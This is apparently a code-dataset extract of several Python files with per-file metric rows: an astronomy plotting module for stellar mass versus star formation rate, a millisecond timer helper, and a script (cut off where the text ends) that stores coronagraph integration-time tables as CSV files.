| 0.095965
| 0.942203
| 0.928026
| 0.928026
| 0.878953
| 0.834242
| 0.834242
| 0
| 0.012728
| 0.231497
| 3,067
| 80
| 110
| 38.3375
| 0.76538
| 0.194327
| 0
| 0.428571
| 1
| 0
| 0.456946
| 0.326062
| 0
| 0
| 0
| 0
| 0.047619
| 1
| 0.047619
| false
| 0.238095
| 0
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
82399fe14dbb9a8330d25752edc90d2578b98432
| 15,626
|
py
|
Python
|
independent/plot.py
|
jacobbieker/Wide_ASPECS
|
79ba3f9d42861ebdd9b731b7c4a41857a04cef40
|
[
"MIT"
] | null | null | null |
independent/plot.py
|
jacobbieker/Wide_ASPECS
|
79ba3f9d42861ebdd9b731b7c4a41857a04cef40
|
[
"MIT"
] | null | null | null |
independent/plot.py
|
jacobbieker/Wide_ASPECS
|
79ba3f9d42861ebdd9b731b7c4a41857a04cef40
|
[
"MIT"
] | null | null | null |
"""
This is focused on the plotting, both of cutouts, SN, and others
"""
import numpy as np
import matplotlib.pyplot as plt
def plot_signal_to_noise():
raise NotImplementedError
def plot_single_cutout():
raise NotImplementedError
def plot_multiple_cutouts():
raise NotImplementedError
def plot_mstar_vs_sfr_third(aspecs_catalog, only_aspecs_match_catalog, matched_catalog, snr_limit, max_z=0.3, labels=('All', 'ASPECS', 'ASPECS CO\n Magphys'), z_lows=(0.0, 1.1, 2.2, 3), z_highs=(0.4, 1.8, 3, 4.4), colors=('lightgrey', 'red', 'orange', 'green'), filename="", z_name="z_co", added_thing="", type='square'):
"""
Given a set of catalogs, plot them with labels in a M* by SFR overlaid with best fits
Does perform cuts and errors on the catalogs
:param z_lows:
:param z_highs:
:param type:
:return:
"""
f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='all', sharey='all')
for index, z_range in enumerate(zip(z_lows, z_highs)):
use_labels = False
if index == 0:
ax = ax1
use_labels = True
elif index == 1:
ax = ax2
use_labels = False
elif index == 2:
ax = ax3
use_labels = False
else:
ax = ax4
use_labels = False
# Calculate and make the Main Sequence Plots
# Do it for the mid point of the range
mid_range_z = (z_range[1] + z_range[0]) / 2.
whitaker_dotted = False
whitaker_mass, whitaker_sfr = whitaker_main_sequence(mid_range_z, 6., 12.)
schrieber_mass, schrieber_sfr = schrieber_main_sequence(mid_range_z, 6., 12.)
if mid_range_z < 0.5 or mid_range_z > 2.5:
whitaker_dotted = True
if use_labels:
ax.plot(schrieber_mass, schrieber_sfr, color='green', label='S15', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', linestyle='dashed',
zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', zorder=20)
ax.plot(schrieber_mass, schrieber_sfr, color='green', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', linestyle='dashed', zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', zorder=20)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", matched_catalog, z_range[0], z_range[1], added="_1")
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", matched_catalog, z_range[0], z_range[1], added="_1")
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], label=labels[0], mec='darkgrey', fmt='.', ms=1, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], fmt='.', mec='darkgrey', ms=1, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", aspecs_catalog, z_range[0], z_range[1], z=z_name, added="_1")
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", aspecs_catalog, z_range[0], z_range[1], z=z_name, added="_1")
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], label=labels[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", only_aspecs_match_catalog, z_range[0], z_range[1], added=added_thing, z=z_name)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", only_aspecs_match_catalog, z_range[0], z_range[1], added=added_thing, z=z_name)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor='blue', label=labels[2], fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor='blue', fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
ax.set_title(str(np.round(z_range[0], 1)) + ' < Z < ' + str(np.round(z_range[1], 1)))
if use_labels:
handles, ax_labels = ax.get_legend_handles_labels()
f.legend(loc='best', handles=handles, labels=ax_labels, prop={'size': 6})
f.text(0.5, 0.01, 'Log(M*)', ha='center')
f.text(0.01, 0.5, 'Log(SFR)', va='center', rotation='vertical')
f.savefig(filename, bbox_inches='tight', dpi=300)
f.show()
def plot_mstar_vs_sfr(aspecs_catalog, matched_catalog, snr_limit, max_z=0.3, labels=('All', 'ASPECS'), z_lows=(0.0, 1.1, 2.2, 3), z_highs=(0.4, 1.8, 3, 4.4), colors=('lightgrey', 'red', 'orange', 'green'), filename="", type='square'):
"""
Given a set of catalogs, plot them with labels in a M* by SFR overlaid with best fits
Does perform cuts and errors on the catalogs
:param z_lows:
:param z_highs:
:param type:
:return:
"""
f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='all', sharey='all')
for index, z_range in enumerate(zip(z_lows, z_highs)):
use_labels = False
if index == 0:
ax = ax1
use_labels = True
elif index == 1:
ax = ax2
use_labels = False
elif index == 2:
ax = ax3
use_labels = False
else:
ax = ax4
use_labels = False
# Calculate and make the Main Sequence Plots
# Do it for the mid point of the range
mid_range_z = (z_range[1] + z_range[0]) / 2.
whitaker_dotted = False
whitaker_mass, whitaker_sfr = whitaker_main_sequence(mid_range_z, 6., 12.)
schrieber_mass, schrieber_sfr = schrieber_main_sequence(mid_range_z, 6., 12.)
if mid_range_z < 0.5 or mid_range_z > 2.5:
whitaker_dotted = True
if use_labels:
ax.plot(schrieber_mass, schrieber_sfr, color='green', label='S15', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', linestyle='dashed',
zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', zorder=20)
ax.plot(schrieber_mass, schrieber_sfr, color='green', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', linestyle='dashed', zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', zorder=20)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", matched_catalog, z_range[0], z_range[1])
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", matched_catalog, z_range[0], z_range[1])
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], label=labels[0], mec='darkgrey', fmt='.', ms=1, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], fmt='.', mec='darkgrey', ms=1, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", aspecs_catalog, z_range[0]-max_z, z_range[1]+max_z)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", aspecs_catalog, z_range[0]-max_z, z_range[1]+max_z)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], label=labels[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
ax.set_title(str(np.round(z_range[0], 1)) + ' < Z < ' + str(np.round(z_range[1], 1)))
if use_labels:
handles, ax_labels = ax.get_legend_handles_labels()
f.legend(loc='best', handles=handles, labels=ax_labels, prop={'size': 6})
f.text(0.5, 0.01, 'Log(M*)', ha='center')
f.text(0.01, 0.5, 'Log(SFR)', va='center', rotation='vertical')
f.savefig(filename, bbox_inches='tight', dpi=300)
f.show()
def plot_mstar_vs_sfr_specz(spec_z_catalog, matched_catalog, no_spec_z_catalog, snr_limit, max_z=0.3, labels=('All', 'ASPECS Spec Z', 'ASPECS Photo Z'), z_lows=(0.0, 1.1, 2.2, 3), z_highs=(0.4, 1.8, 3, 4.4), colors=('lightgrey', 'red', 'blue', 'orange', 'green'), filename="", type='square'):
"""
Given a set of catalogs, plot them with labels in a M* by SFR overlaid with best fits
Does perform cuts and errors on the catalogs
:param z_lows:
:param z_highs:
:param type:
:return:
"""
f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='all', sharey='all')
for index, z_range in enumerate(zip(z_lows, z_highs)):
use_labels = False
if index == 0:
ax = ax1
use_labels = True
elif index == 1:
ax = ax2
use_labels = False
elif index == 2:
ax = ax3
use_labels = False
else:
ax = ax4
use_labels = False
# Calculate and make the Main Sequence Plots
# Do it for the mid point of the range
mid_range_z = (z_range[1] + z_range[0]) / 2.
whitaker_dotted = False
whitaker_mass, whitaker_sfr = whitaker_main_sequence(mid_range_z, 6., 12.)
schrieber_mass, schrieber_sfr = schrieber_main_sequence(mid_range_z, 6., 12.)
if mid_range_z < 0.5 or mid_range_z > 2.5:
whitaker_dotted = True
if use_labels:
ax.plot(schrieber_mass, schrieber_sfr, color='green', label='S15', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', linestyle='dashed',
zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', label='W14', zorder=20)
ax.plot(schrieber_mass, schrieber_sfr, color='green', zorder=20)
if whitaker_dotted:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', linestyle='dashed', zorder=20)
else:
ax.plot(whitaker_mass, whitaker_sfr, color='orange', zorder=20)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", matched_catalog, z_range[0], z_range[1])
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", matched_catalog, z_range[0], z_range[1])
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], label=labels[0], mec='darkgrey', fmt='.', ms=1, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[0], fmt='.', mec='darkgrey', ms=1, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], label=labels[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", no_spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", no_spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[2], label=labels[2], fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[2], fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
ax.set_title(str(np.round(z_range[0], 1)) + ' < Z < ' + str(np.round(z_range[1], 1)))
if use_labels:
handles, ax_labels = ax.get_legend_handles_labels()
f.legend(loc='best', handles=handles, labels=ax_labels, prop={'size': 6})
f.text(0.5, 0.01, 'Log(M*)', ha='center')
f.text(0.01, 0.5, 'Log(SFR)', va='center', rotation='vertical')
f.savefig(filename, bbox_inches='tight', dpi=300)
f.show()
def plot_leinerdt():
raise NotImplementedError
def whitaker_main_sequence(z, mass_start, mass_end):
"""
Returns the main sequence fit for Mstar between mass_start and mass_end for a given Z from
Whitaker et al. 2014
:param z:
:param mass_start:
:param mass_end:
:return:
"""
mass_range = np.linspace(mass_start, mass_end, 100)
if z > 2.0: # Valid till 2.5
sfr = -19.99 + 3.44 * mass_range + -0.13 * mass_range ** 2
elif 1.5 < z <= 2.0:
sfr = -24.04 + 4.17 * mass_range + -0.16 * mass_range ** 2
elif 1.0 < z <= 1.5:
sfr = -26.03 + 4.62 * mass_range + -0.19 * mass_range ** 2
elif z <= 1.0: #Valid to 0.5
sfr = -27.4 + 5.02 * mass_range + -0.22 * mass_range ** 2
return mass_range, sfr
def schrieber_main_sequence(z, mass_start, mass_end):
""""
Returns the x and y values for the Schreiber C. et al. 2015 Main Sequence for galaxies
Because M* and SFR are given in log10 space anyway, need to do 10^value for linspace
But not for SFR output, because it equals log10(SFR) which is what is given
"""
r = np.log10(1 + z)
mass_range = np.linspace(mass_start, mass_end, 100)
m_0 = 0.5 # +-0.07
a_0 = 1.5 # +- 0.15
a_1 = 0.3 # +- 0.08
m_1 = 0.36 # +- 0.3
a_2 = 2.5 # +- 0.6
m_s = mass_range - 9.0
sfr = []
for m in m_s:
sfr.append((m - m_0 + a_0 * r - a_1 * (np.max([0, (m - m_1 - a_2 * r)]) ** 2)))
return mass_range, sfr
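# A minimal usage sketch (added for illustration, not part of the original module):
# evaluate both main-sequence fits at the same redshift so they can be overplotted
# or compared point by point. The helper name and the z/mass bounds are arbitrary.
def _demo_main_sequence(z=1.0):
    w_mass, w_sfr = whitaker_main_sequence(z, 6., 12.)   # log10(Mstar), log10(SFR)
    s_mass, s_sfr = schrieber_main_sequence(z, 6., 12.)  # log10(Mstar), log10(SFR)
    return (w_mass, w_sfr), (s_mass, s_sfr)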
def create_points_and_error_by_z(column_base_name, initial_catalog, low_z, high_z, added="_1", z="z_1"):
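    """
    (Docstring added for clarity.) Selects catalog rows with low_z <= z <= high_z and
    converts the column_base_name 16th/50th/84th-percentile columns into center points
    with asymmetric error bars; rows whose center point is 0 or NaN are dropped.
    """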
z_mask = (initial_catalog[z] >= low_z) & (initial_catalog[z] <= high_z)
centerpoints = initial_catalog[z_mask][str(column_base_name + "_50"+added)]
lower_error = initial_catalog[z_mask][str(column_base_name + "_16"+added)]
upper_error = initial_catalog[z_mask][str(column_base_name + "_84"+added)]
z_values = initial_catalog[z_mask][z]
centerpoints = np.nan_to_num(centerpoints)
lower_error = np.nan_to_num(lower_error)
upper_error = np.nan_to_num(upper_error)
zero_mask = centerpoints != 0.0
centerpoints = centerpoints[zero_mask]
lower_error = centerpoints - lower_error[zero_mask]
upper_error = upper_error[zero_mask] - centerpoints
z_values = z_values[zero_mask]
error_bars = [lower_error, upper_error]
return centerpoints, error_bars, z_values
def create_points_and_error(column_base_name, initial_catalog):
centerpoints = initial_catalog[str(column_base_name + "_50_1")]
lower_error = initial_catalog[str(column_base_name + "_16_1")]
upper_error = initial_catalog[str(column_base_name + "_84_1")]
centerpoints = np.nan_to_num(centerpoints)
zero_mask = centerpoints != 0.0
centerpoints = centerpoints[zero_mask]
lower_error = centerpoints - lower_error[zero_mask]
upper_error = upper_error[zero_mask] - centerpoints
error_bars = [lower_error, upper_error]
return centerpoints, error_bars
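# Worked example (illustrative, with made-up numbers) of the percentile-to-error-bar
# conversion used by both helpers above: for a 16/50/84 triple of (9.1, 9.5, 10.0),
# the center point is the median and the error bars are the distances to it.
def _demo_error_bars():
    p16, p50, p84 = 9.1, 9.5, 10.0
    lower_error = p50 - p16  # 0.4
    upper_error = p84 - p50  # 0.5
    return p50, [lower_error, upper_error]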
| 44.773639
| 321
| 0.632024
| 2,403
| 15,626
| 3.86392
| 0.100291
| 0.030372
| 0.016586
| 0.038772
| 0.875498
| 0.856327
| 0.838449
| 0.830695
| 0.826817
| 0.8014
| 0
| 0.040363
| 0.231025
| 15,626
| 348
| 322
| 44.902299
| 0.732357
| 0.086394
| 0
| 0.744681
| 0
| 0
| 0.05088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046809
| false
| 0
| 0.008511
| 0.017021
| 0.089362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41449bf429453acecccfca15ce692d4a67de1f14
| 81
|
py
|
Python
|
Python/utils.py
|
Nitaym/playcorder
|
69c45abaefe2ad027703a93baf20358aa2472757
|
[
"MIT"
] | null | null | null |
Python/utils.py
|
Nitaym/playcorder
|
69c45abaefe2ad027703a93baf20358aa2472757
|
[
"MIT"
] | null | null | null |
Python/utils.py
|
Nitaym/playcorder
|
69c45abaefe2ad027703a93baf20358aa2472757
|
[
"MIT"
] | null | null | null |
import time
def current_milli_time():
return int(round(time.time() * 1000))
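# A minimal usage sketch (added for illustration): time a stand-in workload with the
# helper above; time is already imported at the top of this file.
if __name__ == '__main__':
    start = current_milli_time()
    time.sleep(0.25)  # stand-in workload
    print(current_milli_time() - start, 'ms elapsed')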
| 16.2
| 41
| 0.703704
| 12
| 81
| 4.583333
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.160494
| 81
| 4
| 42
| 20.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
416700267cefc26aaa1867147bda64a7b5661a8b
| 15,239
|
py
|
Python
|
scripts/store_csv_file.py
|
hsergi/Roman_Coronagraph_ETC
|
b2cfb42d1d74cdcc1a65efeb7a78c904f9cee235
|
[
"Apache-2.0"
] | 1
|
2021-11-16T21:29:10.000Z
|
2021-11-16T21:29:10.000Z
|
scripts/store_csv_file.py
|
hsergi/Roman_Coronagraph_ETC
|
b2cfb42d1d74cdcc1a65efeb7a78c904f9cee235
|
[
"Apache-2.0"
] | null | null | null |
scripts/store_csv_file.py
|
hsergi/Roman_Coronagraph_ETC
|
b2cfb42d1d74cdcc1a65efeb7a78c904f9cee235
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Global constant
from config import INSTALLATION_PATH
# Generic packages
import os
import numpy as np
import pandas as pd
def store_csv_file_acc(starNameCommon, koGood, len_koEvaltimes, \
CGI_epoch0, csvFileName):
"""
PURPOSE
-------
Store the accessibility of the targets
"""
# Create a data frame:
# Star name target 1 (average, %) target 1 ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
    if not os.path.exists(dir_csv):
os.mkdir(dir_csv)
dictCI = {}
if len(starNameCommon) == 1:
dictCI[f'{starNameCommon[0]:s} (average, %)'] = \
np.round(np.sum(koGood) / len_koEvaltimes * 100, 2)
dictCI[f'{starNameCommon[0]:s} (days after {CGI_epoch0:.4f})'] = \
koGood
else:
for star in range(len(starNameCommon)):
dictCI[f'{starNameCommon[star]:s} (average, %)'] = \
np.round(np.sum(koGood[star]) / len_koEvaltimes * 100, 2)
dictCI[f'{starNameCommon[star]:s} (days after {CGI_epoch0:.4f})'] = \
koGood[star]
df = pd.DataFrame.from_dict(dictCI)
# Only show the average on the first row
for star in range(len(starNameCommon)):
df[f'{starNameCommon[star]:s} (average, %)'][1:] = np.nan
if csvFileName.find('.') < 1:
csvFileName += '.csv'
csvFileName = 'accessibility_' + csvFileName
df.to_csv(dir_csv+csvFileName, header=True, encoding='utf-8')
def store_csv_file_sl(filterList, kppList, PNameFilter, WA, d, I,
FR_NF_Imager, FR_Amici_Spec, FR_WF_Imager, SNRList,
intTimeFilterHours, csvFileName):
"""
PURPOSE
-------
Script that stores the estimated integration times of self-luminous
exoplanets as a CSV file
"""
# Create the 2-dimensional data frame:
# Planet name Planet 1 Planet 2 ...
# WA (mas)
# d (AU)
# I (deg)
# Filter (kpp=...)
# Flux ratio
# TimeToSNR# ... (hours)
# ...
# TimeToSNR# ... (hours)
# Filter (kpp=...)
# ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
    if not os.path.exists(dir_csv):
os.mkdir(dir_csv)
dictCI = {'Planet name': [],
'WA (mas)': [],
'd (AU)': [],
'I (deg)': []}
for planet in range(len(PNameFilter)):
dictCI['Planet name'].append(PNameFilter[planet][0])
dictCI['WA (mas)'].append(WA[planet].value * 1000)
dictCI['d (AU)'].append(d[planet].value)
dictCI['I (deg)'].append(I[planet].value)
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_NF_Imager' \
or filterList[filter] == 'OPTI_NF_Imager') \
and not np.isnan(np.sum(FR_NF_Imager)):
dictCI['Flux ratio (NF)'] = FR_NF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_Amici_Spec' \
or filterList[filter] == 'OPTI_Amici_Spec') \
and not np.isnan(np.sum(FR_Amici_Spec)):
dictCI['Flux ratio (Spec)'] = FR_Amici_Spec
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_WF_Imager' \
or filterList[filter] == 'OPTI_WF_Imager') \
and not np.isnan(np.sum(FR_WF_Imager)):
dictCI['Flux ratio (WF)'] = FR_WF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
df = pd.DataFrame.from_dict(dictCI)
df = df.T
if csvFileName.find('.') < 1:
csvFileName += '.csv'
df.to_csv(dir_csv+csvFileName, header=False, encoding='utf-8')
def store_csv_file_rv(filterList, kppList, PName,
dayEpochBestTime, waMasBestTime, fRatioBestTime,
SNRList, intTimeBestHours, SNRPlanetMax,
intTimeSNRMax, csvFileName):
"""
PURPOSE:
Script that stores the estimated integration times of reflected light
exoplanets as a CSV file
"""
# Create the 2-dimensional data frame:
# Planet name Planet 1 Planet 2 ...
# Filter (kpp=...)
# Day of Mission
# WA (mas)
# Flux ratio
# SNRMax
# TimetoSNRMax (hours)
# TimeToSNR# ... (hours)
# ...
# TimeToSNR# ... (hours)
# Filter (kpp=...)
# Day of Mission
# WA (mas)
# ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
    if not os.path.exists(dir_csv):
os.mkdir(dir_csv)
dictCI = {'Planet name': []}
for planet in range(len(PName)):
dictCI['Planet name'].append(PName[planet])
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_NF_Imager' \
or filterList[filter] == 'OPTI_NF_Imager'):
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PName)
dictCI[f'DoM_{filterList[filter]:s}'] = \
np.round(dayEpochBestTime[:, filter, 0, 1], decimals=1)
dictCI[f'WA_{filterList[filter]:s} (mas)'] = \
np.round(waMasBestTime[:,filter, 0, 1], decimals=1)
dictCI[f'FR_{filterList[filter]:s}'] = \
fRatioBestTime[:,filter, 0, 1]
dictCI[f'SNRMax_{filterList[filter]:s}'] = \
SNRPlanetMax[:,filter]
dictCI[f'T_{filterList[filter]:s}_SNRMax (hours)'] = \
np.round(intTimeSNRMax[:,filter], decimals=3)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PName)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeBestHours[planet][filter][snr],
decimals=3))
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_Amici_Spec' \
or filterList[filter] == 'OPTI_Amici_Spec'):
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PName)
dictCI[f'DoM_{filterList[filter]:s}'] = \
np.round(dayEpochBestTime[:, filter, 0, 1], decimals=1)
dictCI[f'WA_{filterList[filter]:s} (mas)'] = \
np.round(waMasBestTime[:,filter, 0, 1], decimals=1)
dictCI[f'FR_{filterList[filter]:s}'] = \
fRatioBestTime[:,filter, 0, 1]
dictCI[f'SNRMax_{filterList[filter]:s}'] = \
SNRPlanetMax[:,filter]
dictCI[f'T_{filterList[filter]:s}_SNRMax (hours)'] = \
np.round(intTimeSNRMax[:,filter], decimals=3)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PName)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeBestHours[planet][filter][snr],
decimals=3))
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_WF_Imager' \
or filterList[filter] == 'OPTI_WF_Imager'):
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PName)
dictCI[f'DoM_{filterList[filter]:s}'] = \
np.round(dayEpochBestTime[:, filter, 0, 1], decimals=1)
dictCI[f'WA_{filterList[filter]:s} (mas)'] = \
np.round(waMasBestTime[:,filter, 0, 1], decimals=1)
dictCI[f'FR_{filterList[filter]:s}'] = \
fRatioBestTime[:,filter, 0, 1]
dictCI[f'SNRMax_{filterList[filter]:s}'] = \
SNRPlanetMax[:,filter]
dictCI[f'T_{filterList[filter]:s}_SNRMax (hours)'] = \
np.round(intTimeSNRMax[:,filter], decimals=3)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PName)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeBestHours[planet][filter][snr],
decimals=3))
df = pd.DataFrame.from_dict(dictCI)
df = df.T
if csvFileName.find('.') < 1:
csvFileName += '.csv'
df.to_csv(dir_csv+csvFileName, header=False, encoding='utf-8')
def store_csv_file_ed(filterList, kppList, PNameFilter, WA,
FR_NF_Imager, FR_Amici_Spec, FR_WF_Imager, SNRList,
intTimeFilterHours, csvFileName):
"""
PURPOSE:
Script that stores the estimated integration times of exo-dust
targets as a CSV file
"""
# Create the 2-dimensional data frame:
# Planet name Planet 1 Planet 2 ...
# WA (mas)
# Filter (kpp=...)
# Flux ratio
# TimeToSNR# ... (hours)
# ...
# TimeToSNR# ... (hours)
# Filter (kpp=...)
# ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
    if not os.path.exists(dir_csv):
os.mkdir(dir_csv)
dictCI = {'Disk name': [],
